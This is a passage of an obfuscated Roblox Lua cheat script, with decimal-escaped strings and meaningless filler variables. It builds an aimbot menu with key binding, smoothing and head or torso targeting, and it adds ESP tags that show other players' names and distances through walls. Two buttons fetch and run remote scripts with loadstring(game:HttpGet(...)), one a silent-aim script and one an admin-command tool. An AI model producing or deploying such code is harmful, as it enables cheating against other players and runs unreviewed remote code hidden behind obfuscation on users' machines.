 v_JKjrkXPvWD.Position = UDim2.new(0.8, 0, 0.5, 0)
local v_nnXJvT = 822;
 v_JKjrkXPvWD.BackgroundColor3 = Color3.fromRGB(35, 65, 30)
 v_JKjrkXPvWD.TextColor3 = Color3.new(1, 1, 1)
 v_JKjrkXPvWD.Text = "\65\73\77"
local v_OcDEfT = 213;
if v_OcDEfT > 103 then v_OcDEfT = v_OcDEfT + 1 end;
 v_JKjrkXPvWD.Font = Enum.Font.GothamBold
local v_iYKSUa = 167;
 v_JKjrkXPvWD.TextSize = 14
 v_JKjrkXPvWD.Visible = v_kGvULLiDbM
local v_lCxNck = 717;
 Instance.new("\85\73\67\111\114\110\101\114", v_JKjrkXPvWD).CornerRadius = UDim.new(1, 0)
 
 local v_YhvYICPJCI, mDragStart, mStartPos
local v_cHIzZI = 333;
if v_cHIzZI > 288 then v_cHIzZI = v_cHIzZI + 1 end;
 v_JKjrkXPvWD.InputBegan:Connect(function(input)
 if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
local v_fPieIp = 542;
if v_fPieIp > 428 then v_fPieIp = v_fPieIp + 1 end;
 v_YhvYICPJCI = (1 == 1)
local v_maXHpa = 897;
 mDragStart = input.Position
 mStartPos = v_JKjrkXPvWD.Position
local v_XvRwxP = 261;
 
 
 if v_cVbVimUDwJ == "\72\79\76\68" then
 v_dpNwnTAMhN = (1 == 1)
 else
local v_EwVkXJ = 683;
if v_EwVkXJ > 478 then v_EwVkXJ = v_EwVkXJ + 1 end;
 v_dpNwnTAMhN = not v_dpNwnTAMhN
 end
 end
local v_BbvTsZ = 100;
if v_BbvTsZ > 319 then v_BbvTsZ = v_BbvTsZ + 1 end;
 end)
local v_qpUVHU = 642;
 v_JKjrkXPvWD.InputEnded:Connect(function(input)
 if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
 v_YhvYICPJCI = (1 == 2)
local v_lBxKiW = 977;
if v_lBxKiW > 304 then v_lBxKiW = v_lBxKiW + 1 end;
 if v_cVbVimUDwJ == "\72\79\76\68" then
local v_sqpmKX = 777;
 v_dpNwnTAMhN = (1 == 2)
 end
 end
local v_fPkUms = 231;
if v_fPkUms > 110 then v_fPkUms = v_fPkUms + 1 end;
 end)
local v_VQoYYD = 595;
 v_FPgxcQATwb.InputChanged:Connect(function(input)
local v_aaTAif = 454;
if v_aaTAif > 188 then v_aaTAif = v_aaTAif + 1 end;
 if v_YhvYICPJCI and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
 local v_IYcpJidxKa = input.Position - mDragStart
 if v_IYcpJidxKa.Magnitude > 5 then 
 v_JKjrkXPvWD.Position = UDim2.new(mStartPos.X.Scale, mStartPos.X.Offset + v_IYcpJidxKa.X, mStartPos.Y.Scale, mStartPos.Y.Offset + v_IYcpJidxKa.Y)
 end
 end
local v_EgPfcF = 109;
if v_EgPfcF > 232 then v_EgPfcF = v_EgPfcF + 1 end;
 end)
local v_emwDki = 638;
 v_uvXHJJOyoL("\65\105\109\98\111\116\32\75\101\121\58", v_dFAnSHIXJt, UDim2.new(0.1, 0, 0.12, 0), function(k) v_dFAnSHIXJt = k end)
 v_uvXHJJOyoL("\77\101\110\117\32\84\111\103\103\108\101\32\40\66\41\58", v_FVRhhktucf, UDim2.new(0.1, 0, 0.25, 0), function(k) v_FVRhhktucf = k end)
 v_uHseVZzwhM("\65\105\109\32\77\111\100\101\58", {"\72\79\76\68", "\84\79\71\71\76\69"}, 1, UDim2.new(0.1, 0, 0.38, 0), function(m)
 v_cVbVimUDwJ = m
 v_dpNwnTAMhN = (1 == 2)
 end)
local v_KQsgnW = 862;
if v_KQsgnW > 262 then v_KQsgnW = v_KQsgnW + 1 end;
 v_uHseVZzwhM("\77\111\98\105\108\101\32\66\117\116\116\111\110\58", {"\79\70\70", "\79\78"}, (v_kGvULLiDbM and 2 or 1), UDim2.new(0.1, 0, 0.51, 0), function(o)
 v_JKjrkXPvWD.Visible = (o == "\79\78")
local v_EdzlwU = 115;
 end)
local v_kiRpEz = 443;
if v_kiRpEz > 157 then v_kiRpEz = v_kiRpEz + 1 end;
 v_bloIsSFvFr("\83\109\111\111\116\104\105\110\103\32\40\48\46\48\49\32\45\32\49\41\58", tostring(v_CnkKBWjZhu), UDim2.new(0.1, 0, 0.64, 0), function(t) 
 local v_jnesNtDzbZ = tonumber(t) 
 if v_jnesNtDzbZ then v_CnkKBWjZhu = math.clamp(v_jnesNtDzbZ, 0.01, 1) else v_CnkKBWjZhu = 1 end 
 end)
 v_uHseVZzwhM("\84\97\114\103\101\116\32\80\97\114\116\58", {"\72\101\97\100", "\84\111\114\115\111"}, 1, UDim2.new(0.1, 0, 0.77, 0), function(p)
 if p == "\84\111\114\115\111" then
 v_HrrcumkFbq = "\85\112\112\101\114\84\111\114\115\111"
 else
 v_HrrcumkFbq = "\72\101\97\100"
 end
 end)
 v_FPgxcQATwb.InputBegan:Connect(function(i, p) 
local v_KLOdER = 257;
if v_KLOdER > 37 then v_KLOdER = v_KLOdER + 1 end;
 if p then return end 
 if i.KeyCode == v_dFAnSHIXJt then 
 if v_cVbVimUDwJ == "\72\79\76\68" then
 v_dpNwnTAMhN = (1 == 1) 
 else
 v_dpNwnTAMhN = not v_dpNwnTAMhN
 end
local v_iksDQP = 898;
if v_iksDQP > 98 then v_iksDQP = v_iksDQP + 1 end;
 elseif i.KeyCode == v_FVRhhktucf then
local v_XzwfuW = 430;
if v_XzwfuW > 352 then v_XzwfuW = v_XzwfuW + 1 end;
 v_oqBjKCLFwR()
 end 
 end)
 v_FPgxcQATwb.InputEnded:Connect(function(i) 
 if i.KeyCode == v_dFAnSHIXJt and v_cVbVimUDwJ == "\72\79\76\68" then 
local v_qbqGio = 154;
 v_dpNwnTAMhN = (1 == 2) 
 end 
local v_unntsg = 755;
if v_unntsg > 420 then v_unntsg = v_unntsg + 1 end;
 end)
 script.Parent.MouseButton1Click:Connect(v_oqBjKCLFwR)
 v_NrnamCPpMF.RenderStepped:Connect(function()
local v_lXrWbY = 422;
if v_lXrWbY > 113 then v_lXrWbY = v_lXrWbY + 1 end;
 if v_dpNwnTAMhN then
local v_PAosjD = 239;
if v_PAosjD > 109 then v_PAosjD = v_PAosjD + 1 end;
 local v_mczwZaNbgJ = v_phjayfliSg()
local v_sJsRvK = 203;
 if v_mczwZaNbgJ then
 local v_PKdgldpusU = CFrame.new(v_uZXiWdojtQ.CFrame.Position, v_mczwZaNbgJ.Position)
 v_uZXiWdojtQ.CFrame = v_uZXiWdojtQ.CFrame:Lerp(v_PKdgldpusU, v_CnkKBWjZhu)
 end
local v_cmznmV = 465;
if v_cmznmV > 364 then v_cmznmV = v_cmznmV + 1 end;
 end
 end)
 
end
coroutine.wrap(v_KVCjYvmmUq)()
local function v_taqgQwDZpK() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_OQuEByXoRC)
local v_VxxEJu = 289;
if v_VxxEJu > 17 then v_VxxEJu = v_VxxEJu + 1 end;

 local v_lrOnXbkbBy = game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")
 
 local v_AkBgEWMiwb = script.Parent
 local v_RGgGtYTflA = v_AkBgEWMiwb.Parent
local v_xQvqtJ = 207;
if v_xQvqtJ > 368 then v_xQvqtJ = v_xQvqtJ + 1 end;
 
 local v_nLmSpvoWnE = (1 == 2)
 
local v_ZhIgeD = 36;
 local v_kWAQSfunCx = Color3.fromRGB(0, 255, 127) 
 local v_xUIPKCFKWm = Color3.fromRGB(255, 50, 50) 
 
 local v_XrFKMWYfPp = TweenInfo.new(0.3, Enum.EasingStyle.Quart, Enum.EasingDirection.Out)
 
 v_AkBgEWMiwb.Font = Enum.Font.SourceSansBold 
 v_AkBgEWMiwb.Text = "\79\70\70"
 v_RGgGtYTflA.BackgroundColor3 = v_xUIPKCFKWm
 
local v_JOePCa = 268;
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
 v_nLmSpvoWnE = not v_nLmSpvoWnE
 
 if v_nLmSpvoWnE then
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_kWAQSfunCx})
 v_lcTtCWREbS:Play()
local v_TuiONC = 404;
 v_AkBgEWMiwb.Text = "\79\78"
 else
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_xUIPKCFKWm})
 v_lcTtCWREbS:Play()
local v_VLEMmI = 319;
 v_AkBgEWMiwb.Text = "\79\70\70"
 end
local v_kBxxrx = 614;
 end)
end
coroutine.wrap(v_taqgQwDZpK)()
local function v_wbawctiXob() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_OQuEByXoRC)
local v_YiJWHC = 912;

 local v_NrnamCPpMF = game:GetService("\82\117\110\83\101\114\118\105\99\101")
local v_wYkpOc = 391;
if v_wYkpOc > 473 then v_wYkpOc = v_wYkpOc + 1 end;
 local v_hejSMBEVJo = game:GetService("\80\108\97\121\101\114\115")
local v_EEglNF = 684;
if v_EEglNF > 100 then v_EEglNF = v_EEglNF + 1 end;
 local v_FYJvtgmvgZ = v_hejSMBEVJo.LocalPlayer
 local v_AkBgEWMiwb = script.Parent
local v_gaYDqt = 552;
 local v_ojgNyMXczR = (1 == 2)
 
 local function v_ZsYZwOvSVn(player)
 if player == v_FYJvtgmvgZ then return end
 local function v_dsduJtjTzz(v_GfbDmehAVH)
local v_CbzLqY = 439;
if v_CbzLqY > 172 then v_CbzLqY = v_CbzLqY + 1 end;
 if not v_ojgNyMXczR then return end
 
 local v_yxfswhtoBh = v_GfbDmehAVH:WaitForChild("\72\101\97\100", 10)
 if v_yxfswhtoBh and not v_yxfswhtoBh:FindFirstChild("\69\83\80\84\97\103") then
 local v_BrQXNCvJNz = Instance.new("\66\105\108\108\98\111\97\114\100\71\117\105", v_yxfswhtoBh)
 v_BrQXNCvJNz.Name = "\69\83\80\84\97\103"
 v_BrQXNCvJNz.Size = UDim2.new(0, 150, 0, 75)
local v_POZKuj = 983;
if v_POZKuj > 42 then v_POZKuj = v_POZKuj + 1 end;
 v_BrQXNCvJNz.AlwaysOnTop = (1 == 1)
local v_XbFOud = 102;
 v_BrQXNCvJNz.StudsOffset = Vector3.new(0, 3, 0)
 local v_KqMLbpPbpi = Instance.new("\84\101\120\116\76\97\98\101\108", v_BrQXNCvJNz)
 v_KqMLbpPbpi.Name = "\84\101\120\116\76\97\98\101\108"
 v_KqMLbpPbpi.BackgroundTransparency = 1
 v_KqMLbpPbpi.Size = UDim2.new(1, 0, 1, 0)
local v_cWJVGR = 59;
 v_KqMLbpPbpi.TextColor3 = player.TeamColor.Color 
local v_JMCfut = 733;
if v_JMCfut > 351 then v_JMCfut = v_JMCfut + 1 end;
 v_KqMLbpPbpi.Font = Enum.Font.GothamBold
 v_KqMLbpPbpi.TextStrokeTransparency = 0 
 v_KqMLbpPbpi.TextSize = 14
local v_uCQxnb = 870;
if v_uCQxnb > 231 then v_uCQxnb = v_uCQxnb + 1 end;
 end
local v_jkprig = 208;
if v_jkprig > 124 then v_jkprig = v_jkprig + 1 end;
 end
 player.CharacterAdded:Connect(v_dsduJtjTzz)
 if player.Character then v_dsduJtjTzz(player.Character) end
 
local v_KMewiu = 653;
 player:GetPropertyChangedSignal("\84\101\97\109"):Connect(function()
local v_oElLzn = 54;
if v_oElLzn > 92 then v_oElLzn = v_oElLzn + 1 end;
 if player.Character then v_dsduJtjTzz(player.Character) end
local v_SmxBdJ = 467;
if v_SmxBdJ > 360 then v_SmxBdJ = v_SmxBdJ + 1 end;
 end)
 end
 v_hejSMBEVJo.PlayerAdded:Connect(v_ZsYZwOvSVn)
 for _, p in pairs(v_hejSMBEVJo:GetPlayers()) do
 v_ZsYZwOvSVn(p)
local v_dPgkte = 526;
 end
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
 v_ojgNyMXczR = not v_ojgNyMXczR
 if v_ojgNyMXczR then
 for _, p in pairs(v_hejSMBEVJo:GetPlayers()) do 
 if p.Character then v_ZsYZwOvSVn(p) end 
 end
 else
 for _, p in pairs(v_hejSMBEVJo:GetPlayers()) do
 if p.Character and p.Character:FindFirstChild("\72\101\97\100") then
 local v_gVqjYsczIy = p.Character.Head:FindFirstChild("\69\83\80\84\97\103")
local v_HvBRGb = 963;
 if v_gVqjYsczIy then v_gVqjYsczIy:Destroy() end
 end
 end
 end
local v_xsXyRl = 453;
if v_xsXyRl > 273 then v_xsXyRl = v_xsXyRl + 1 end;
 end)
 v_NrnamCPpMF.RenderStepped:Connect(function()
local v_VifrgN = 978;
if v_VifrgN > 374 then v_VifrgN = v_VifrgN + 1 end;
 if v_ojgNyMXczR then
 local v_gnpZMwNNRt = v_FYJvtgmvgZ.Character and v_FYJvtgmvgZ.Character:FindFirstChild("\72\101\97\100")
 if not v_gnpZMwNNRt then return end
 for _, p in pairs(v_hejSMBEVJo:GetPlayers()) do
 if p ~= v_FYJvtgmvgZ and p.Character and p.Character:FindFirstChild("\72\101\97\100") then
local v_tFRtKb = 105;
 local v_yxfswhtoBh = p.Character.Head
local v_bVikag = 921;
 local v_gVqjYsczIy = v_yxfswhtoBh:FindFirstChild("\69\83\80\84\97\103")
 local v_VwQEHnWJIk = v_gVqjYsczIy and v_gVqjYsczIy:FindFirstChild("\84\101\120\116\76\97\98\101\108")
local v_OTTnyi = 584;
 if v_VwQEHnWJIk then
local v_uvmTeA = 714;
if v_uvmTeA > 125 then v_uvmTeA = v_uvmTeA + 1 end;
 local v_jGfAFqwnSZ = math.floor((v_gnpZMwNNRt.Position - v_yxfswhtoBh.Position).Magnitude)
 v_VwQEHnWJIk.Text = p.Name .. "\92\110\91" .. v_jGfAFqwnSZ .. "\109\93"
local v_jeFgFt = 994;
 
 v_VwQEHnWJIk.TextColor3 = p.TeamColor.Color
local v_ftrWbF = 80;
if v_ftrWbF > 159 then v_ftrWbF = v_ftrWbF + 1 end;
 end
 end
local v_ySIjBG = 245;
if v_ySIjBG > 397 then v_ySIjBG = v_ySIjBG + 1 end;
 end
local v_KmVTxk = 109;
 end
 end)
end
coroutine.wrap(v_wbawctiXob)()
local function v_THPNmMdLhZ() 
local v_hNkBWr = 395;
if v_hNkBWr > 13 then v_hNkBWr = v_hNkBWr + 1 end;
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_OmtxzyOIMZ)
local v_ffJctd = 400;

 local v_AkBgEWMiwb = script.Parent
 
local v_sKFFSS = 940;
if v_sKFFSS > 320 then v_sKFFSS = v_sKFFSS + 1 end;
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
 local v_vGjNpXyThR, err = pcall(function()
 loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\83\116\101\102\97\110\117\107\49\50\47\65\105\109\105\110\103\47\109\97\105\110\47\69\120\97\109\112\108\101\115\47\85\110\105\118\101\114\115\97\108\83\105\108\101\110\116\65\105\109\46\108\117\97", (1 == 1)))()
 end)
 end)
end
coroutine.wrap(v_THPNmMdLhZ)()
local v_DUimxN = 1;
local function v_UOoYQyXEqd() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_OmtxzyOIMZ)
local v_TvMywl = 447;

 local v_lrOnXbkbBy = game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")
 
local v_vjaYan = 46;
 local v_AkBgEWMiwb = script.Parent
 local v_RGgGtYTflA = v_AkBgEWMiwb.Parent 
 
 local v_nLmSpvoWnE = (1 == 2)
 
 local v_kWAQSfunCx = Color3.fromRGB(0, 255, 127) 
 local v_xUIPKCFKWm = Color3.fromRGB(255, 50, 50) 
 
local v_LtAztB = 492;
 local v_XrFKMWYfPp = TweenInfo.new(0.3, Enum.EasingStyle.Quart, Enum.EasingDirection.Out)
 
local v_cFhwqH = 474;
 v_AkBgEWMiwb.Font = Enum.Font.SourceSansBold 
 v_AkBgEWMiwb.Text = "\79\70\70"
 v_RGgGtYTflA.BackgroundColor3 = v_xUIPKCFKWm
 
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
 v_nLmSpvoWnE = not v_nLmSpvoWnE
 
 if v_nLmSpvoWnE then
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_kWAQSfunCx})
 v_lcTtCWREbS:Play()
 v_AkBgEWMiwb.Text = "\79\78"
 else
local v_puUHag = 460;
if v_puUHag > 281 then v_puUHag = v_puUHag + 1 end;
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_xUIPKCFKWm})
 v_lcTtCWREbS:Play()
local v_bVRwji = 511;
if v_bVRwji > 191 then v_bVRwji = v_bVRwji + 1 end;
 v_AkBgEWMiwb.Text = "\79\70\70"
local v_jtzSyJ = 617;
if v_jtzSyJ > 13 then v_jtzSyJ = v_jtzSyJ + 1 end;
 end
local v_XOgMPB = 704;
if v_XOgMPB > 21 then v_XOgMPB = v_XOgMPB + 1 end;
 end)
end
coroutine.wrap(v_UOoYQyXEqd)()
local function v_NPgVCBohJr() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_EktHFSKVlX)

 local v_AkBgEWMiwb = script.Parent
 
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
 local v_vGjNpXyThR, err = pcall(function()
 loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\100\103\101\73\89\47\105\110\102\105\110\105\116\101\121\105\101\108\100\47\109\97\115\116\101\114\47\115\111\117\114\99\101"))()
 end)
 end)
local v_fqmXDM = 579;
if v_fqmXDM > 394 then v_fqmXDM = v_fqmXDM + 1 end;
end
coroutine.wrap(v_NPgVCBohJr)()
local function v_PAahUOSTNE() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_EktHFSKVlX)
local v_JgjFVN = 654;
if v_JgjFVN > 477 then v_JgjFVN = v_JgjFVN + 1 end;

local v_BskZEE = 493;
 local v_lrOnXbkbBy = game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")
 
 local v_AkBgEWMiwb = script.Parent
 local v_RGgGtYTflA = v_AkBgEWMiwb.Parent 
 
 local v_nLmSpvoWnE = (1 == 2)
 
 
 local v_kWAQSfunCx = Color3.fromRGB(0, 255, 127) 
 local v_xUIPKCFKWm = Color3.fromRGB(255, 50, 50) 
 
 
 local v_XrFKMWYfPp = TweenInfo.new(0.3, Enum.EasingStyle.Quart, Enum.EasingDirection.Out)
local v_KxSDgm = 850;
 
 v_AkBgEWMiwb.Font = Enum.Font.SourceSansBold 
 v_AkBgEWMiwb.Text = "\79\70\70"
 v_RGgGtYTflA.BackgroundColor3 = v_xUIPKCFKWm
 
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
local v_fYFINS = 654;
 v_nLmSpvoWnE = not v_nLmSpvoWnE
 
 if v_nLmSpvoWnE then
local v_uLhtdE = 760;
if v_uLhtdE > 278 then v_uLhtdE = v_uLhtdE + 1 end;
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_kWAQSfunCx})
 v_lcTtCWREbS:Play()
 v_AkBgEWMiwb.Text = "\79\78"
 else
local v_BwXxVs = 72;
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_xUIPKCFKWm})
local v_PLWLFd = 539;
if v_PLWLFd > 460 then v_PLWLFd = v_PLWLFd + 1 end;
 v_lcTtCWREbS:Play()
 v_AkBgEWMiwb.Text = "\79\70\70"
 end
 end)
end
coroutine.wrap(v_PAahUOSTNE)()
